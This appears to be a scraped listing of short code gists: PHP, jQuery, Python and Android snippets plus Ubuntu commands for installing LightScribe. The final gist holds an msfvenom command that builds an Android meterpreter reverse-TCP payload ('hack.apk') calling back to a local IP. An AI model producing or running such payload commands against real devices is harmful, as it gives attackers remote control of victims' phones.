http://www.laboratoriocss.it/trucchi-sulle-animazioni-css.html
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function getIntegerComplement( $n) { | |
$n = (int) $n; | |
$mask = bindec(str_repeat('1', strlen(decbin($n)))); | |
$val = $n ^ $mask; | |
return $val; | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// requires jquery | |
var abidibo = abidibo || {}; | |
abidibo.menu = {}; | |
// miniaturized menu | |
abidibo.menu.miniaturize = function(event) { | |
// ff mobile | |
window.scrollTo(0, 0); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
(http://reubuntu.blogspot.it/2014/02/lightscribe-e-una-tecnologia-di.html) | |
(http://stackoverflow.com/questions/23182765/how-to-install-ia32-libs-in-ubuntu-14-04-lts-trusty-tahr) | |
sudo dpkg --add-architecture i386 | |
sudo apt-get update | |
sudo apt-get install libc6:i386 libncurses5:i386 libstdc++6:i386 | |
http://download.lightscribe.com/ls/lightscribe-1.18.8.1-linux-2.6-intel.deb | |
http://download.lightscribe.com/ls/lightscribeApplications-1.18.6.1-linux-2.6-intel.deb | |
https://www.lacie.com/download/drivers/LaCie%20LightScribe%20Labeler%201.0%20Linux.rpm (https://www.lacie.com/us/support/drivers/driver.htm?id=10061) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<slideshow> | |
<img src="//lorempixel.com/670/401" alt="img-1" /> | |
<img src="//lorempixel.com/670/400" alt="img-2" /> | |
<img src="//lorempixel.com/670/399" alt="img-3" /> | |
</slideshow> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
"use strict"; | |
var numberStringToText; | |
(function() { | |
var dict = { | |
'0': ' ', | |
'00': '0', | |
'1': '1', | |
'11': ',', | |
'111': '.', | |
'1111': ':', |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
class PluginMount(type): | |
def __init__(cls, name, bases, attrs): | |
print cls | |
if not hasattr(cls, 'plugins'): | |
cls.plugins = [] | |
else: | |
print cls.plugins | |
cls.plugins.append(cls) | |
print cls.plugins | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package org.torinometeo.tmforecast; | |
import android.content.Context; | |
import android.net.ConnectivityManager; | |
import android.net.NetworkInfo; | |
import android.os.AsyncTask; | |
import android.support.v7.app.AppCompatActivity; | |
import android.os.Bundle; | |
import android.widget.EditText; |
replace msfpayload command with:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.78 LPORT=443 > hack.apk